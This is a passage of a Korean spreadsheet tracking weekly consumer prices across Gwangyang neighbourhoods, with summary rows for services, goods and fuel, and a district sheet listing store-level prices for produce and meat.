A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 6 | E77: 6 | F77: 7,375 | G77: 7,375 | H77: 0 | I77: 0 | J77: =광양읍1!F77 -> 7,000 | K77: =광양읍1!G77 -> 7,000 | L77: 0 | M77: =광양읍2!F77 -> 8,000 | N77: =광양읍2!G77 -> 8,000 | O77: 0 | P77: =중마동1!F77 -> 8,000 | Q77: =중마동1!G77 -> 8,000 | R77: 0 | S77: =중마동2!F77 -> 8,000 | T77: =중마동2!G77 -> 8,000 | U77: 0 | V77: =광영동!F77 -> 8,250 | W77: =광영동!G77 -> 8,250 | X77: 0 | Y77: =금호동!F77 -> 5,000 | Z77: =금호동!G77 -> 5,000 | AA77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 1 | E78: 1 | F78: 90,000 | G78: 90,000 | H78: 0 | I78: 0 | J78: =광양읍1!F78 -> 0 | K78: =광양읍1!G78 -> 0 | L78: 0 | M78: =광양읍2!F78 -> 0 | N78: =광양읍2!G78 -> 0 | O78: 0 | P78: =중마동1!F78 -> 90,000 | Q78: =중마동1!G78 -> 90,000 | R78: 0 | S78: =중마동2!F78 -> 0 | T78: =중마동2!G78 -> 0 | U78: 0 | V78: =광영동!F78 -> 0 | W78: =광영동!G78 -> 0 | X78: 0 | Y78: =금호동!F78 -> 0 | Z78: =금호동!G78 -> 0 | AA78: 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 5 | E79: 5 | F79: 41,500 | G79: 41,500 | H79: 0 | I79: 0 | J79: =광양읍1!F79 -> 37,500 | K79: =광양읍1!G79 -> 37,500 | L79: 0 | M79: =광양읍2!F79 -> 37,500 | N79: =광양읍2!G79 -> 37,500 | O79: 0 | P79: =중마동1!F79 -> 52,500 | Q79: =중마동1!G79 -> 52,500 | R79: 0 | S79: =중마동2!F79 -> 40,000 | T79: =중마동2!G79 -> 40,000 | U79: 0 | V79: =광영동!F79 -> 40,000 | W79: =광영동!G79 -> 40,000 | X79: 0 | Y79: =금호동!F79 -> 0 | Z79: =금호동!G79 -> 0 | AA79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 0 | E80: 0 | F80: 0 | G80: 0 | H80: 0 | I80: 0 | J80: =광양읍1!F80 -> 0 | K80: =광양읍1!G80 -> 0 | L80: 0 | M80: =광양읍2!F80 -> 0 | N80: =광양읍2!G80 -> 0 | O80: 0 | P80: =중마동1!F80 -> 0 | Q80: =중마동1!G80 -> 0 | R80: 0 | S80: =중마동2!F80 -> 0 | T80: =중마동2!G80 -> 0 | U80: 0 | V80: =광영동!F80 -> 0 | W80: =광영동!G80 -> 0 | X80: 0 | Y80: =금호동!F80 -> 0 | Z80: =금호동!G80 -> 0 | AA80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 5 | E81: 5 | F81: 1,230 | G81: 1,230 | H81: 0 | I81: 0 | J81: =광양읍1!F81 -> 1,350 | K81: =광양읍1!G81 -> 1,350 | L81: 0 | M81: =광양읍2!F81 -> 1,400 | N81: =광양읍2!G81 -> 1,400 | O81: 0 | P81: =중마동1!F81 -> 1,200 | Q81: =중마동1!G81 -> 1,200 | R81: 0 | S81: =중마동2!F81 -> 1,000 | T81: =중마동2!G81 -> 1,000 | U81: 0 | V81: =광영동!F81 -> 1,200 | W81: =광영동!G81 -> 1,200 | X81: 0 | Y81: =금호동!F81 -> 0 | Z81: =금호동!G81 -> 0 | AA81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 6 | E82: 6 | F82: 8,333 | G82: 8,333 | H82: 0 | I82: 0 | J82: =광양읍1!F82 -> 7,000 | K82: =광양읍1!G82 -> 7,000 | L82: 0 | M82: =광양읍2!F82 -> 6,000 | N82: =광양읍2!G82 -> 6,000 | O82: 0 | P82: =중마동1!F82 -> 6,250 | Q82: =중마동1!G82 -> 6,250 | R82: 0 | S82: =중마동2!F82 -> 6,750 | T82: =중마동2!G82 -> 6,750 | U82: 0 | V82: =광영동!F82 -> 16,000 | W82: =광영동!G82 -> 16,000 | X82: 0 | Y82: =금호동!F82 -> 8,000 | Z82: =금호동!G82 -> 8,000 | AA82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 1 | E83: 1 | F83: 12,000 | G83: 12,000 | H83: 0 | I83: 0 | J83: =광양읍1!F83 -> 0 | K83: =광양읍1!G83 -> 0 | L83: 0 | M83: =광양읍2!F83 -> 0 | N83: =광양읍2!G83 -> 0 | O83: 0 | P83: =중마동1!F83 -> 0 | Q83: =중마동1!G83 -> 0 | R83: 0 | S83: =중마동2!F83 -> 0 | T83: =중마동2!G83 -> 0 | U83: 0 | V83: =광영동!F83 -> 12,000 | W83: =광영동!G83 -> 12,000 | X83: 0 | Y83: =금호동!F83 -> 0 | Z83: =금호동!G83 -> 0 | AA83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 0 | E84: 0 | F84: 0 | G84: 0 | H84: 0 | I84: 0 | J84: =광양읍1!F84 -> 0 | K84: =광양읍1!G84 -> 0 | L84: 0 | M84: =광양읍2!F84 -> 0 | N84: =광양읍2!G84 -> 0 | O84: 0 | P84: =중마동1!F84 -> 0 | Q84: =중마동1!G84 -> 0 | R84: 0 | S84: =중마동2!F84 -> 0 | T84: =중마동2!G84 -> 0 | U84: 0 | V84: =광영동!F84 -> 0 | W84: =광영동!G84 -> 0 | X84: 0 | Y84: =금호동!F84 -> 0 | Z84: =금호동!G84 -> 0 | AA84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: 6 | E86: 6 | F86: 5,909 | G86: 5,909 | H86: 0 | I86: =IF(F86=0,0,((G86-F86)/F86)) -> 0 | J86: =광양읍1!F86 -> 5,470 | K86: =광양읍1!G86 -> 5,470 | L86: =광양읍1!H86 -> 0 | M86: =광양읍2!F86 -> 6,050 | N86: =광양읍2!G86 -> 6,050 | O86: =광양읍2!H86 -> 0 | P86: =중마동1!F86 -> 5,525 | Q86: =중마동1!G86 -> 5,525 | R86: =중마동1!H86 -> 0 | S86: =중마동2!F86 -> 6,335 | T86: =중마동2!G86 -> 6,335 | U86: =중마동2!H86 -> 0 | V86: =광영동!F86 -> 5,625 | W86: =광영동!G86 -> 5,625 | X86: =광영동!H86 -> 0 | Y86: =금호동!F86 -> 6,450 | Z86: =금호동!G86 -> 6,450 | AA86: =금호동!H86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 6 | E87: 6 | F87: 1,354 | G87: 1,354 | H87: 0 | I87: =IF(F87=0,0,((G87-F87)/F87)) -> 0 | J87: =광양읍1!F87 -> 1,450 | K87: =광양읍1!G87 -> 1,450 | L87: =광양읍1!H87 -> 0 | M87: =광양읍2!F87 -> 1,475 | N87: =광양읍2!G87 -> 1,475 | O87: =광양읍2!H87 -> 0 | P87: =중마동1!F87 -> 1,485 | Q87: =중마동1!G87 -> 1,485 | R87: =중마동1!H87 -> 0 | S87: =중마동2!F87 -> 1,425 | T87: =중마동2!G87 -> 1,425 | U87: =중마동2!H87 -> 0 | V87: =광영동!F87 -> 990 | W87: =광영동!G87 -> 990 | X87: =광영동!H87 -> 0 | Y87: =금호동!F87 -> 1,300 | Z87: =금호동!G87 -> 1,300 | AA87: =금호동!H87 -> 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 6 | E88: 6 | F88: 1,133 | G88: 1,133 | H88: 0 | I88: 0 | J88: =광양읍1!F88 -> 1,135 | K88: =광양읍1!G88 -> 1,135 | L88: =광양읍1!H88 -> 0 | M88: =광양읍2!F88 -> 1,200 | N88: =광양읍2!G88 -> 1,200 | O88: =광양읍2!H88 -> 0 | P88: =중마동1!F88 -> 1,070 | Q88: =중마동1!G88 -> 1,070 | R88: =중마동1!H88 -> 0 | S88: =중마동2!F88 -> 1,175 | T88: =중마동2!G88 -> 1,175 | U88: =중마동2!H88 -> 0 | V88: =광영동!F88 -> 1,140 | W88: =광영동!G88 -> 1,140 | X88: =광영동!H88 -> 0 | Y88: =금호동!F88 -> 1,080 | Z88: =금호동!G88 -> 1,080 | AA88: =금호동!H88 -> 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 6 | E89: 6 | F89: 8495.833333 | G89: 8214.166667 | H89: -281.6666667 | I89: -0.03315350662 | J89: =광양읍1!F89 -> 7735 | K89: =광양읍1!G89 -> 7735 | L89: =광양읍1!H89 -> 0 | M89: =광양읍2!F89 -> 8850 | N89: =광양읍2!G89 -> 8850 | O89: =광양읍2!H89 -> 0 | P89: =중마동1!F89 -> 7730 | Q89: =중마동1!G89 -> 7730 | R89: =중마동1!H89 -> 0 | S89: =중마동2!F89 -> 9765 | T89: =중마동2!G89 -> 9765 | U89: =중마동2!H89 -> 0 | V89: =광영동!F89 -> 7730 | W89: =광영동!G89 -> 6040 | X89: =광영동!H89 -> -1690 | Y89: =금호동!F89 -> 9165 | Z89: =금호동!G89 -> 9165 | AA89: =금호동!H89 -> 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 6 | E90: 6 | F90: 2640 | G90: 2640 | H90: 0 | I90: 0 | J90: =광양읍1!F90 -> 2935 | K90: =광양읍1!G90 -> 2935 | L90: =광양읍1!H90 -> 0 | M90: =광양읍2!F90 -> 2900 | N90: =광양읍2!G90 -> 2900 | O90: =광양읍2!H90 -> 0 | P90: =중마동1!F90 -> 2380 | Q90: =중마동1!G90 -> 2380 | R90: =중마동1!H90 -> 0 | S90: =중마동2!F90 -> 2645 | T90: =중마동2!G90 -> 2645 | U90: =중마동2!H90 -> 0 | V90: =광영동!F90 -> 2530 | W90: =광영동!G90 -> 2530 | X90: =광영동!H90 -> 0 | Y90: =금호동!F90 -> 2450 | Z90: =금호동!G90 -> 2450 | AA90: =금호동!H90 -> 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 6 | E91: 6 | F91: 453.3333333 | G91: 453.3333333 | H91: 0 | I91: 0 | J91: =광양읍1!F91 -> 320 | K91: =광양읍1!G91 -> 320 | L91: =광양읍1!H91 -> 0 | M91: =광양읍2!F91 -> 425 | N91: =광양읍2!G91 -> 425 | O91: =광양읍2!H91 -> 0 | P91: =중마동1!F91 -> 430 | Q91: =중마동1!G91 -> 430 | R91: =중마동1!H91 -> 0 | S91: =중마동2!F91 -> 540 | T91: =중마동2!G91 -> 540 | U91: =중마동2!H91 -> 0 | V91: =광영동!F91 -> 515 | W91: =광영동!G91 -> 515 | X91: =광영동!H91 -> 0 | Y91: =금호동!F91 -> 490 | Z91: =금호동!G91 -> 490 | AA91: =금호동!H91 -> 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 6 | E92: 6 | F92: 1740 | G92: 1740 | H92: 0 | I92: 0 | J92: =광양읍1!F92 -> 1680 | K92: =광양읍1!G92 -> 1680 | L92: =광양읍1!H92 -> 0 | M92: =광양읍2!F92 -> 1800 | N92: =광양읍2!G92 -> 1800 | O92: =광양읍2!H92 -> 0 | P92: =중마동1!F92 -> 1695 | Q92: =중마동1!G92 -> 1695 | R92: =중마동1!H92 -> 0 | S92: =중마동2!F92 -> 1820 | T92: =중마동2!G92 -> 1820 | U92: =중마동2!H92 -> 0 | V92: =광영동!F92 -> 1615 | W92: =광영동!G92 -> 1615 | X92: =광영동!H92 -> 0 | Y92: =금호동!F92 -> 1830 | Z92: =금호동!G92 -> 1830 | AA92: =금호동!H92 -> 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 6 | E93: 6 | F93: 1460.833333 | G93: 1460.833333 | H93: 0 | I93: 0 | J93: =광양읍1!F93 -> 1405 | K93: =광양읍1!G93 -> 1405 | L93: =광양읍1!H93 -> 0 | M93: =광양읍2!F93 -> 1600 | N93: =광양읍2!G93 -> 1600 | O93: =광양읍2!H93 -> 0 | P93: =중마동1!F93 -> 1385 | Q93: =중마동1!G93 -> 1385 | R93: =중마동1!H93 -> 0 | S93: =중마동2!F93 -> 1525 | T93: =중마동2!G93 -> 1525 | U93: =중마동2!H93 -> 0 | V93: =광영동!F93 -> 1395 | W93: =광영동!G93 -> 1395 | X93: =광영동!H93 -> 0 | Y93: =금호동!F93 -> 1455 | Z93: =금호동!G93 -> 1455 | AA93: =금호동!H93 -> 0
A94: 9 | B94: 등유 | C94: 주유소 1ℓ | D94: 2 | E94: 2 | F94: 1375 | G94: 1375 | H94: 0 | I94: 0 | J94: =광양읍1!F94 -> 1400 | K94: =광양읍1!G94 -> 1400 | L94: =광양읍1!H94 -> 0 | M94: =광양읍2!F94 -> 1350 | N94: =광양읍2!G94 -> 1350 | O94: =광양읍2!H94 -> 0 | P94: =중마동1!F94 -> 0 | Q94: =중마동1!G94 -> 0 | R94: =중마동1!H94 -> 0 | S94: =중마동2!F94 -> 0 | T94: =중마동2!G94 -> 0 | U94: =중마동2!H94 -> 0 | V94: =광영동!F94 -> 0 | W94: =광영동!G94 -> 0 | X94: =광영동!H94 -> 0 | Y94: =금호동!F94 -> 0 | Z94: =금호동!G94 -> 0 | AA94: =금호동!H94 -> 0
A95: 10 | B95: 경유 | C95: 주유소 1ℓ | D95: 5 | E95: 5 | F95: 1590.3 | G95: 1566.6 | H95: -23.7 | I95: -0.01490284852 | J95: =광양읍1!F95 -> 1570 | K95: =광양읍1!G95 -> 1526 | L95: =광양읍1!H95 -> -44 | M95: =광양읍2!F95 -> 1586.5 | N95: =광양읍2!G95 -> 1570 | O95: =광양읍2!H95 -> -16.5 | P95: =중마동1!F95 -> 1603.5 | Q95: =중마동1!G95 -> 1572 | R95: =중마동1!H95 -> -31.5 | S95: =중마동2!F95 -> 1588 | T95: =중마동2!G95 -> 1571.5 | U95: =중마동2!H95 -> -16.5 | V95: =광영동!F95 -> 1603.5 | W95: =광영동!G95 -> 1593.5 | X95: =광영동!H95 -> -10 | Y95: =금호동!F95 -> 0 | Z95: =금호동!G95 -> 0 | AA95: =금호동!H95 -> 0
A96: 11 | B96: 휘발유 | C96: 주유소 1ℓ (무연) | D96: 5 | E96: 5 | F96: 1625.6 | G96: 1608.6 | H96: -17 | I96: -0.01045767717 | J96: =광양읍1!F96 -> 1615 | K96: =광양읍1!G96 -> 1566 | L96: =광양읍1!H96 -> -49 | M96: =광양읍2!F96 -> 1627 | N96: =광양읍2!G96 -> 1620 | O96: =광양읍2!H96 -> -7 | P96: =중마동1!F96 -> 1644 | Q96: =중마동1!G96 -> 1627 | R96: =중마동1!H96 -> -17 | S96: =중마동2!F96 -> 1608.5 | T96: =중마동2!G96 -> 1601.5 | U96: =중마동2!H96 -> -7 | V96: =광영동!F96 -> 1633.5 | W96: =광영동!G96 -> 1628.5 | X96: =광영동!H96 -> -5 | Y96: =금호동!F96 -> 0 | Z96: =금호동!G96 -> 0 | AA96: 0
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 6 | E97: 6 | F97: 139300.8333 | G97: 139300.8333 | H97: 0 | I97: 0 | J97: =광양읍1!F97 -> 130000 | K97: =광양읍1!G97 -> 130000 | L97: =광양읍1!H97 -> 0 | M97: =광양읍2!F97 -> 145805 | N97: =광양읍2!G97 -> 145805 | O97: =광양읍2!H97 -> 0 | P97: =중마동1!F97 -> 150000 | Q97: =중마동1!G97 -> 150000 | R97: =중마동1!H97 -> 0 | S97: =중마동2!F97 -> 150000 | T97: =중마동2!G97 -> 150000 | U97: =중마동2!H97 -> 0 | V97: =광영동!F97 -> 140000 | W97: =광영동!G97 -> 140000 | X97: =광영동!H97 -> 0 | Y97: =금호동!F97 -> 120000 | Z97: =금호동!G97 -> 120000 | AA97: =금호동!H97 -> 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 6 | E98: 6 | F98: 130833.3333 | G98: 130833.3333 | H98: 0 | I98: 0 | J98: =광양읍1!F98 -> 145000 | K98: =광양읍1!G98 -> 145000 | L98: =광양읍1!H98 -> 0 | M98: =광양읍2!F98 -> 135000 | N98: =광양읍2!G98 -> 135000 | O98: =광양읍2!H98 -> 0 | P98: =중마동1!F98 -> 155000 | Q98: =중마동1!G98 -> 155000 | R98: =중마동1!H98 -> 0 | S98: =중마동2!F98 -> 150000 | T98: =중마동2!G98 -> 150000 | U98: =중마동2!H98 -> 0 | V98: =광영동!F98 -> 120000 | W98: =광영동!G98 -> 120000 | X98: =광영동!H98 -> 0 | Y98: =금호동!F98 -> 80000 | Z98: =금호동!G98 -> 80000 | AA98: =금호동!H98 -> 0
V100: 1,534

Sheet 광양읍1
A2: 주 간 물 가 동 향(광양읍)
M3: 조사자 : 이문주
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(농협하나로마트) | M4: 조 사 2 지 역(트라이얼코리아)
F5: 금주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg | D7: =COUNTIF(J7,"<>0")+COUNTIF(N7,"<>0") -> 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 60,750 | G7: =IF(E7=0,0,SUM(K7,O7)/E7) -> 60,750 | H7: =G7-F7 -> 0 | I7: 농협하나로마트 | J7: 57,000 | K7: 57,000 | L7: =K7-J7 -> 0 | M7: 트라이얼코리아 | N7: 64,500 | O7: 64,500 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: =COUNTIF(K8,"<>0")+COUNTIF(O8,"<>0") -> 2 | F8: =IF(D8=0,0,SUM(J8,N8)/D8) -> 885 | G8: =IF(E8=0,0,SUM(K8,O8)/E8) -> 1,107 | H8: =G8-F8 -> 223 | I8: 농협하나로마트 | J8: 801 | K8: 1,164 | L8: =K8-J8 -> 363 | M8: 트라이얼코리아 | N8: 968 | O8: 1,050 | P8: =O8-N8 -> 82
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: =COUNTIF(J9,"<>0")+COUNTIF(N9,"<>0") -> 2 | E9: =COUNTIF(K9,"<>0")+COUNTIF(O9,"<>0") -> 2 | F9: =IF(D9=0,0,SUM(J9,N9)/D9) -> 6,639 | G9: =IF(E9=0,0,SUM(K9,O9)/E9) -> 6,349 | H9: =G9-F9 -> -291 | I9: 농협하나로마트 | J9: 3,571 | K9: 3,235 | L9: =K9-J9 -> -336 | M9: 트라이얼코리아 | N9: 9,707 | O9: 9,462 | P9: =O9-N9 -> -245
A10: 4 | B10: 양상추 | C10: 상품1개(350~400g) | D10: =COUNTIF(J10,"<>0")+COUNTIF(N10,"<>0") -> 2 | E10: =COUNTIF(K10,"<>0")+COUNTIF(O10,"<>0") -> 2 | F10: =IF(D10=0,0,SUM(J10,N10)/D10) -> 1,925 | G10: =IF(E10=0,0,SUM(K10,O10)/E10) -> 2,002 | H10: =G10-F10 -> 77 | I10: 농협하나로마트 | J10: 1000 | K10: 900 | L10: =K10-J10 -> -100 | M10: 트라이얼코리아 | N10: 2,849 | O10: 3,103 | P10: =O10-N10 -> 254
A11: 5 | B11: 애호박 | C11: 상품1개(300~350g) | D11: =COUNTIF(J11,"<>0")+COUNTIF(N11,"<>0") -> 2 | E11: =COUNTIF(K11,"<>0")+COUNTIF(O11,"<>0") -> 2 | F11: =IF(D11=0,0,SUM(J11,N11)/D11) -> 1,545 | G11: =IF(E11=0,0,SUM(K11,O11)/E11) -> 1,545 | H11: =G11-F11 -> 0 | I11: 농협하나로마트 | J11: 1500 | K11: 1500 | L11: =K11-J11 -> 0 | M11: 트라이얼코리아 | N11: 1,590 | O11: 1,590 | P11: =O11-N11 -> 0
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: =COUNTIF(J12,"<>0")+COUNTIF(N12,"<>0") -> 2 | E12: =COUNTIF(K12,"<>0")+COUNTIF(O12,"<>0") -> 2 | F12: =IF(D12=0,0,SUM(J12,N12)/D12) -> 9,149 | G12: =IF(E12=0,0,SUM(K12,O12)/E12) -> 9,149 | H12: =G12-F12 -> 0 | I12: 농협하나로마트 | J12: 8,298 | K12: 8,298 | L12: =K12-J12 -> 0 | M12: 트라이얼코리아 | N12: 10000 | O12: 10,000 | P12: =O12-N12 -> 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: =COUNTIF(J13,"<>0")+COUNTIF(N13,"<>0") -> 2 | E13: =COUNTIF(K13,"<>0")+COUNTIF(O13,"<>0") -> 2 | F13: =IF(D13=0,0,SUM(J13,N13)/D13) -> 3,345 | G13: =IF(E13=0,0,SUM(K13,O13)/E13) -> 3,345 | H13: =G13-F13 -> 0 | I13: 농협하나로마트 | J13: 3,200 | K13: 3,200 | L13: =K13-J13 -> 0 | M13: 트라이얼코리아 | N13: 3,490 | O13: 3,490 | P13: =O13-N13 -> 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: =COUNTIF(J14,"<>0")+COUNTIF(N14,"<>0") -> 2 | E14: =COUNTIF(K14,"<>0")+COUNTIF(O14,"<>0") -> 2 | F14: =IF(D14=0,0,SUM(J14,N14)/D14) -> 4,418 | G14: =IF(E14=0,0,SUM(K14,O14)/E14) -> 4,343 | H14: =G14-F14 -> -75 | I14: 농협하나로마트 | J14: 3,600 | K14: 2,700 | L14: =K14-J14 -> -900 | M14: 트라이얼코리아 | N14: 5,235 | O14: 5,985 | P14: =O14-N14 -> 750
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: =COUNTIF(J15,"<>0")+COUNTIF(N15,"<>0") -> 2 | E15: =COUNTIF(K15,"<>0")+COUNTIF(O15,"<>0") -> 2 | F15: =IF(D15=0,0,SUM(J15,N15)/D15) -> 12,804 | G15: =IF(E15=0,0,SUM(K15,O15)/E15) -> 12,804 | H15: =G15-F15 -> 0 | I15: 농협하나로마트 | J15: 5,846 | K15: 5,846 | L15: =K15-J15 -> 0 | M15: 트라이얼코리아 | N15: 19,761 | O15: 19,761 | P15: =O15-N15 -> 0
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: =COUNTIF(J16,"<>0")+COUNTIF(N16,"<>0") -> 2 | E16: =COUNTIF(K16,"<>0")+COUNTIF(O16,"<>0") -> 2 | F16: =IF(D16=0,0,SUM(J16,N16)/D16) -> 8,895 | G16: =IF(E16=0,0,SUM(K16,O16)/E16) -> 8,395 | H16: =G16-F16 -> -500 | I16: 농협하나로마트 | J16: 9,800 | K16: 9,800 | L16: =K16-J16 -> 0 | M16: 트라이얼코리아 | N16: 7,990 | O16: 6,990 | P16: =O16-N16 -> -1,000
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: =COUNTIF(J17,"<>0")+COUNTIF(N17,"<>0") -> 2 | E17: =COUNTIF(K17,"<>0")+COUNTIF(O17,"<>0") -> 2 | F17: =IF(D17=0,0,SUM(J17,N17)/D17) -> 4,600 | G17: =IF(E17=0,0,SUM(K17,O17)/E17) -> 4,300 | H17: =G17-F17 -> -300 | I17: 농협하나로마트 | J17: 5,300 | K17: 4,700 | L17: =K17-J17 -> -600 | M17: 트라이얼코리아 | N17: 3,900 | O17: 3,900 | P17: =O17-N17 -> 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: =COUNTIF(J18,"<>0")+COUNTIF(N18,"<>0") -> 2 | E18: =COUNTIF(K18,"<>0")+COUNTIF(O18,"<>0") -> 2 | F18: =IF(D18=0,0,SUM(J18,N18)/D18) -> 3,000 | G18: =IF(E18=0,0,SUM(K18,O18)/E18) -> 3,000 | H18: =G18-F18 -> 0 | I18: 농협하나로마트 | J18: 3,000 | K18: 3,000 | L18: =K18-J18 -> 0 | M18: 트라이얼코리아 | N18: 3,000 | O18: 3,000 | P18: =O18-N18 -> 0
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: =COUNTIF(J19,"<>0")+COUNTIF(N19,"<>0") -> 2 | E19: =COUNTIF(K19,"<>0")+COUNTIF(O19,"<>0") -> 2 | F19: =IF(D19=0,0,SUM(J19,N19)/D19) -> 2,158 | G19: =IF(E19=0,0,SUM(K19,O19)/E19) -> 2,158 | H19: =G19-F19 -> 0 | I19: 농협하나로마트 | J19: 2,625 | K19: 2,625 | L19: =K19-J19 -> 0 | M19: 트라이얼코리아 | N19: 1,690 | O19: 1,690 | P19: =O19-N19 -> 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: =COUNTIF(J20,"<>0")+COUNTIF(N20,"<>0") -> 2 | E20: =COUNTIF(K20,"<>0")+COUNTIF(O20,"<>0") -> 2 | F20: =IF(D20=0,0,SUM(J20,N20)/D20) -> 4,150 | G20: =IF(E20=0,0,SUM(K20,O20)/E20) -> 4,150 | H20: =G20-F20 -> 0 | I20: 농협하나로마트 | J20: 4,600 | K20: 4,600 | L20: =K20-J20 -> 0 | M20: 트라이얼코리아 | N20: 3,700 | O20: 3,700 | P20: =O20-N20 -> 0
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: =COUNTIF(J21,"<>0")+COUNTIF(N21,"<>0") -> 2 | E21: =COUNTIF(K21,"<>0")+COUNTIF(O21,"<>0") -> 2 | F21: =IF(D21=0,0,SUM(J21,N21)/D21) -> 4,750 | G21: =IF(E21=0,0,SUM(K21,O21)/E21) -> 4,500 | H21: =G21-F21 -> -250 | I21: 농협하나로마트 | J21: 5,500 | K21: 5,000 | L21: =K21-J21 -> -500 | M21: 트라이얼코리아 | N21: 4,000 | O21: 4,000 | P21: =O21-N21 -> 0
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: =COUNTIF(J22,"<>0")+COUNTIF(N22,"<>0") -> 2 | E22: =COUNTIF(K22,"<>0")+COUNTIF(O22,"<>0") -> 2 | F22: =IF(D22=0,0,SUM(J22,N22)/D22) -> 3,093 | G22: =IF(E22=0,0,SUM(K22,O22)/E22) -> 2,752 | H22: =G22-F22 -> -341 | I22: 농협하나로마트 | J22: 3,617 | K22: 3,154 | L22: =K22-J22 -> -463 | M22: 트라이얼코리아 | N22: 2,568 | O22: 2,349 | P22: =O22-N22 -> -219
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: =COUNTIF(J23,"<>0")+COUNTIF(N23,"<>0") -> 2 | E23: =COUNTIF(K23,"<>0")+COUNTIF(O23,"<>0") -> 2 | F23: =IF(D23=0,0,SUM(J23,N23)/D23) -> 70,500 | G23: =IF(E23=0,0,SUM(K23,O23)/E23) -> 70,500 | H23: =G23-F23 -> 0 | I23: 농협하나로마트 | J23: 66,000 | K23: 66,000 | L23: =K23-J23 -> 0 | M23: 트라이얼코리아 | N23: 75,000 | O23: 75,000 | P23: =O23-N23 -> 0
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: =COUNTIF(J24,"<>0")+COUNTIF(N24,"<>0") -> 0 | E24: =COUNTIF(K24,"<>0")+COUNTIF(O24,"<>0") -> 0 | F24: =IF(D24=0,0,SUM(J24,N24)/D24) -> 0 | G24: =IF(E24=0,0,SUM(K24,O24)/E24) -> 0 | H24: =G24-F24 -> 0 | I24: 농협하나로마트 | J24: 0 | K24: 0 | L24: =K24-J24 -> 0 | M24: 트라이얼코리아 | N24: 0 | O24: 0 | P24: =O24-N24 -> 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: =COUNTIF(J25,"<>0")+COUNTIF(N25,"<>0") -> 2 | E25: =COUNTIF(K25,"<>0")+COUNTIF(O25,"<>0") -> 2 | F25: =IF(D25=0,0,SUM(J25,N25)/D25) -> 14,850 | G25: =IF(E25=0,0,SUM(K25,O25)/E25) -> 14,850 | H25: =G25-F25 -> 0 | I25: 농협하나로마트 | J25: 15,300 | K25: 15,300 | L25: =K25-J25 -> 0 | M25: 트라이얼코리아 | N25: 14,400 | O25: 14,400 | P25: =O25-N25 -> 0
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: =COUNTIF(J26,"<>0")+COUNTIF(N26,"<>0") -> 2 | E26: =COUNTIF(K26,"<>0")+COUNTIF(O26,"<>0") -> 2 | F26: =IF(D26=0,0,SUM(J26,N26)/D26) -> 7,350 | G26: =IF(E26=0,0,SUM(K26,O26)/E26) -> 7,350 | H26: =G26-F26 -> 0 | I26: 농협하나로마트 | J26: 7,500 | K26: 7,500 | L26: =K26-J26 -> 0 | M26: 트라이얼코리아 | N26: 7,200 | O26: 7,200 | P26: =O26-N26 -> 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: =COUNTIF(J27,"<>0")+COUNTIF(N27,"<>0") -> 2 | E27: =COUNTIF(K27,"<>0")+COUNTIF(O27,"<>0") -> 2 | F27: =IF(D27=0,0,SUM(J27,N27)/D27) -> 6,940 | G27: =IF(E27=0,0,SUM(K27,O27)/E27) -> 6,940 | H27: =G27-F27 -> 0 | I27: 농협하나로마트 | J27: 7,390 | K27: 7,390 | L27: =K27-J27 -> 0 | M27: 트라이얼코리아 | N27: 6,490 | O27: 6,490 | P27: =O27-N27 -> 0
